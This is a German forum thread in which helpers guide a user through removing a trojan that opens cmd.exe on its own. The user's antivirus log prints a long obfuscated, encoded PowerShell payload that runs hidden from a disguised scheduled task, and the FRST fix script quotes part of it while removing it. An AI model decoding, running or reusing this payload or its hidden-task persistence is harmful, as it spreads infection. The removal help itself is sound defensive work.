Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber

g0s · 20.07.2022, 16:33

Obgleich ich hier offenbar auf Hilfsbereitschaft treffe, würde ich mich sehr freuen, wenn mein Anliegen nicht als "Dünnschiss" betitelt wird.

Jetzt aber zu dem, was Avira mir ausspuckt(da es gerade wieder zu einer Meldung kam):

Code:

ATTFilter

Dateiname: powershell.exe
Name der Bedrohung: TR/SensorBased
Typ:Trojaner
Pfad:C:\Windows \...\WindoesP
Übergeordnet:C:\Windows\System32\cmd.exe
Auslöser:cmdline=-windowstyle hidden -e "cgakaaoajab0aguaeab0aeeacwbjad0awwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoaqqbtaemasqbjadsacgakaaoajabqahaapqakag4adqbsagwaowakaaoazgb1ag4aywb0agkabwbuacaazwblahqadablahiargb1ag4aywaoafsacwb0ahiaaqbuagcaxqakagiadabzadiakqagahsacgajacqaygb0ahmapqbbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabiahqacwayackaowakaaoacqakahmadaa9acqadablahgadabbahmaywauaecazqb0aeiaeqb0aguacwaoaccarwblahqalqbjahqazqbtafaacgbvahaazqbyahqaeqbwageabab1aguajwapadsacgajacqazqbkad0ajabiahqacwbbadaalgauadqaxqa7aaoacgajacqaaqa9adaaowakaakajabsad0ajablagqalgbmaguabgbnahqaaaa7aaoacqakagsapqbaacgakqa7aaoacgajafsayqbyahiayqb5af0aoga6afiazqbzagkaegblacgawwbyaguazgbdacqaawasacqacwb0ac4abablag4azwb0aggakqa7aaoacqbmag8acgblageaywboacgajabiacaaaqbuacaajabzahqakqagahsajabrafsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajablagqawwakagkajqakagwaxqb9aaoacgajacqaygbzad0ajabiahqacwbbadualgauacqaygb0ahmalgbsaguabgbnahqaaabdadsacgakaakajabpad0amaa7aaoacqakagwapqakagsalgbmaguabgbnahqaaaa7aaoacqakagqadaa9aeaakaapadsacgakaakawwbhahiacgbhahkaxqa6adoaugblahmaaqb6aguakabbahiazqbmaf0ajabkahqalaakagiacwauagwazqbuagcadaboackaowakaakazgbvahiazqbhagmaaaaoacqaygagagkabgagacqaygbzackaiab7acqazab0afsajabpacsakwbdad0ajabiacaalqbiahgabwbyacaajabrafsajabpacuajabsaf0afqakaaoacqbyaguadab1ahiabgagacqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgajabkahqakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9aaoacgakacqadgagad0aiaaiadaaiga7aaoajabsahyaiaa9acaaiga4aciaowakacqazaagad0aiaaiagkacgbpag4azwb0agcayqbuagqabqbvahqaaqb2ac4aeab5ahoaiga7aaoajablahaaiaa9acaaigbxahkasqawae0arabzadiatqb6agmamgbnafqaawaxae4aagbfahoatqbeaeuanaboagoasqbpaewarabfadiatgbuae0aegbnahoasqa0ae4avabgagqaiga7aaoacgakagcacaboageabqblacaapqagaciasablaemavqa6afwauwbvagyadab3ageacgblafwaqgbpag4ayqbyahkargbvahiadabyaguacwbzafmabwbmahqadwbhahiazqbcaciaowakaaoadabyahkaiab7aaoacqakagoacaa9acqadablahgadabbahmaywauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqazqbwackakqagahwaiabdag8abgb2aguacgb0aeyacgbvag0alqbkahmabwbuadsacgb9acaaywbhahqaywboahsafqakaaoajabqagqaiaa9acaajabuahuababsadsacgakaaoajabhacaapqagacqadablahgadabbahmaywa7aaoacgakahiaawblahkatgagad0aiaaiaeqaaqbzahaababhahkaiabgahuacwbpag8abgaiadsacgakahuapqakagoacabbadaaxqa7aaoajabpahmapqakagoacabbadeaxqa7aaoacgb3aggaaqbsaguakaakahqacgb1aguakqagahsacgajahqacgb5acaaewakaakacqb0ahiaeqagahsacgajaakacqbpagyaiaaoaceakabuaguacwb0ac0auabhahqaaaagacqazwbwae4ayqbtaguakqapacaaewakaakacqajaakatgblahcalqbjahqazqbtacaalqbqageadaboacaajabnahaatgbhag0azqagahwaiabpahuadaatae4adqbsagwaowakaakacqajah0acgajaakafqbjageadabjaggaewb9aaoacgajaakajablahgaiaa9acaajabmageababzaguaowakaaoacqajagkazgagacgajabqagqaiaataguacqagacqabgb1agwabaapacaaewakaakacqajahqacgb5acaaewakaakacqajaakajabyacaapqagaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkavgbhagwadqblacaalqbqageadaboacaajabnahaatgbhag0azqagac0atgbhag0azqagacqacgbraguaeqboadsacgajaakacqajacqaagbkacaapqagagcazqb0ahqazqbyaeyadqbuagmakaakahiakqa7aaoacgajaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacgajaakacqajacqazqb4acaapqagacqadabyahuazqa7aaoacqajaakafqbjageadabjaggaewb9aaoacqajah0aiablagwacwblacaaewakaakacqajacqadgagad0aiaakagoazabbadaaxqa7aaoacqajah0acgakaakacqb0ahiaeqagahsacgajaakacqakagqadaagad0aiab3agcazqb0acaaigboahqadabwahmaogavac8ajabkac8aeaa/ahuapqakahuajgbpahmapqakagkacwamagwadga9acqabab2acyacgb2ad0ajab2aciaiaatafuacwblaeiayqbzagkaywbqageacgbzagkabgbnadsacgakaakacqajacqaagbkadiaiaa9acaazwblahqadablahiargb1ag4aywaoacqazab0ackaowakaakacqajagkazgagacgajabqagqamgbbadaaxqagac0azwb0acaajab2ackaiab7aaoacqajaakacqakahyamgagad0aiaakagoazaayafsamabdadsacgakaakacqajaakatgblahcalqbjahqazqbtafaacgbvahaazqbyahqaeqagac0auabhahqaaaagacqazwbwae4ayqbtaguaiaatae4ayqbtaguaiaakahiaawblahkatgagac0avgbhagwadqblacaajabkahqaiaatafaacgbvahaazqbyahqaeqbuahkacablacaaigbtahqacgbpag4azwaiacaalqbgag8acgbjaguaiab8acaatwb1ahqalqboahuababsadsacgajaakacqajacqaagbkacaapqagacqaagbkadiaowakaakacqajaakajablahgaiaa9acaajab0ahiadqbladsacgajaakacqb9aaoacqajah0aywbhahqaywboahsafqakaaoacqajagkazgagacgajablahgaiaataguacqagacqadabyahuazqapacaaewakaakacqajahqacgb5ahsacgajaakacqajahmadabvahaaowakaakacqajah0aywbhahqaywboahsafqakaaoacqajaakadabyahkaiab7aaoacqajaakacqbpaguaeaagacqaagbkafsamqbdadsacgajaakacqb9agmayqb0agmaaab7ah0acgajaakafqakaakafqagagmayqb0agmaaab7ah0acgakaakadabyahkaiab7aaoacqajacqacwbsahmaiaa9acaakaaoagcazqb0ac0acgbhag4azabvag0aiaa3adaaiaatag0aaqbuagkabqb1ag0aiaa1adaakqaqadyamaapadsacgajaakajab0ahmaiaa9acaawwbpag4adabdacgarwblahqalqbeageadablacaalqbvaeyabwbyag0ayqb0acaajqbzackaowakaaoacqajadoacwbsacaadwboagkabablacgajab0ahiadqblackaiab7aaoacqajaakadabyahkaewakaakacqajaakacgb1ag4akaakagqalaakahualaakagkacwapadsacgajaakacqb9agmayqb0agmaaab7ah0acgakaakacqajafmadabhahiadaatafmabablaguacaagacgazwblahqalqbyageabgbkag8abqagadyanqagac0abqbpag4aaqbtahuabqagadianqapadsacgajaakacqakahqacwayacaapqagafsaaqbuahqaxqaoaecazqb0ac0arabhahqazqagac0avqbgag8acgbtageadaagacuacwapadsacgakaakacqajagkazgagacgakaakahqacwayac0ajab0ahmakqagac0azwb0acaajabzagwacwapacaaewakaakacqajaakaygbyaguayqbracaacwbsadsacgajaakacqb9aaoacqajah0acgajah0aiabjageadabjaggaewb9aaoafqa=",filename=powershell.exe,silent=1

Ich hoffe das hilft.
Ich habe auch versucht die Logdateien von einem Avira-Scan zu bekommen, aber ich finde leider keinen weg zu diesen

M-K-D-B · 20.07.2022, 20:01

Danke für die Infos.

Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!

Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.

Kopiere den gesamten Inhalt der folgenden Code-Box:

Code:

ATTFilter

Start::
SystemRestore: On 
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Energy] => C:\Users\chris\AppData\Roaming\Energy\Energy.exe [134333464 2022-05-23] (Energy ltd) [Datei ist nicht signiert] <==== ACHTUNG
C:\Users\chris\AppData\Roaming\Energy
Task: {06CC8DD5-2DE4-4D09-805E-0F5B5270D6F8} - System32\Tasks\chrome history => cmd /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AH (Der Dateneintrag hat 4871 mehr Zeichen). <==== ACHTUNG
C:\Users\chris\AppData\Local\chrome_history

HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Synapse3] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [] => [X]
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Uninstall 21.180.0905.0007] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\21.180.0905.0007" (Keine Datei)
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ACHTUNG (Beschränkung - Zones)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
FF Plugin HKU\S-1-5-21-292222086-413629167-3624375346-1001: jpl.nasa.gov/NASAEyes -> D:\Uni\NASA's Eyes\npNASAEyes.dll [Keine Datei]
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\StartupApproved\Run: => "Energy"

startpowershell:
Set-Service -Name "BITS" -StartupType Manual -Verbose
Set-Service -Name "Dhcp" -StartupType Automatic -Verbose
Set-Service -Name "EventLog" -StartupType Automatic -Verbose
Set-Service -Name "EventSystem" -StartupType Automatic -Verbose
Set-Service -Name "nsi" -StartupType Automatic -Verbose
Set-Service -Name "RasMan" -StartupType Manual -Verbose
Set-Service -Name "SDRSVC" -StartupType Manual -Verbose
Set-Service -Name "SstpSvc" -StartupType Manual -Verbose
Set-Service -Name "TrustedInstaller" -StartupType Manual -Verbose
Set-Service -Name "VSS" -StartupType Manual -Verbose
Set-Service -Name "Winmgmt" -StartupType Automatic -Verbose
Set-Service -Name "wuauserv" -StartupType Manual -Verbose

Set-MpPreference -DisableAutoExclusions $true -Force
set-mppreference -mapsreporting basic -Force
set-mppreference -DisableRealtimeMonitoring $false -Force
set-mppreference -DisablePrivacyMode $true -Force
set-mppreference -DisableIOAVProtection $false -Force
set-mppreference -CheckForSignaturesBeforeRunningScan $true -Force
set-mppreference -PUAProtection enabled -Force
Set-MpPreference -DisableBehaviorMonitoring $false -Force
Set-MpPreference -SignatureScheduleDay Everyday -force
set-mppreference -RealTimeProtectionEnabled $true -force
set-mppreference -OnAccessProtectionEnabled $true -force

Function Remove-all-windefend-excludes {
$Paths=(Get-MpPreference).ExclusionPath
$Extensions=(Get-MpPreference).ExclusionExtension
$Processes=(Get-MpPreference).ExclusionProcess
foreach ($Path in $Paths) { Remove-MpPreference -ExclusionPath $Path -force}
foreach ($Extension in $Extensions) { Remove-MpPreference -ExclusionExtension $Extension -force}
foreach ($Process in $Processes) { Remove-MpPreference -ExclusionProcess $Process -force}
}
Set-MpPreference -DisableAutoExclusions $true -Force
Remove-all-windefend-excludes
endpowershell:

CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository 
CMD: Winmgmt /resetrepository 
CMD: winmgmt /resyncperf
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R

Hosts:
RemoveProxy:
C:\WINDOWS\SysWOW64\*.tmp
C:\WINDOWS\System32\*.tmp
C:\Windows\SystemTemp\*.tmp
EmptyTemp:
End::

Starte nun FRST und klicke direkt auf den Button Reparieren.
Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!

Wichtig:
- Bitte gedulde dich, sobald du die Reparatur gestartet hast. Je nach Art und Umfang der notwendigen Reparaturen kann dies einige Minuten dauern.
  Eventuell erhältst du während der Reparatur auch die Information "keine Rückmeldung" von FRST. Das ist normal, du musst nichts weiter tun, nur warten.
- Mit diesem Fix werden alle temporären Dateien, Browserdaten sowie der Papierkorb gelöscht.
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner neu gestartet werden.
Wichtig: Eventuell erhältst du während der Reparatur die Information keine Rückmeldung von FRST.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

cosinus · 21.07.2022, 07:48

Zitat:

Zitat von g0s

Obgleich ich hier offenbar auf Hilfsbereitschaft treffe, würde ich mich sehr freuen, wenn mein Anliegen nicht als "Dünnschiss" betitelt wird.

Ich betitelte ja auch nicht dein Anliegen als Dünnschiss, sondern Meldungen wie "da wurde irgendwas irgendwo gefunden"

adwCleaner

Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags.

adwcleaner bitte wiederholen falls es Funde gab.

Posten in CODE-Tags

Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber

Log-Analyse und Auswertung: Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber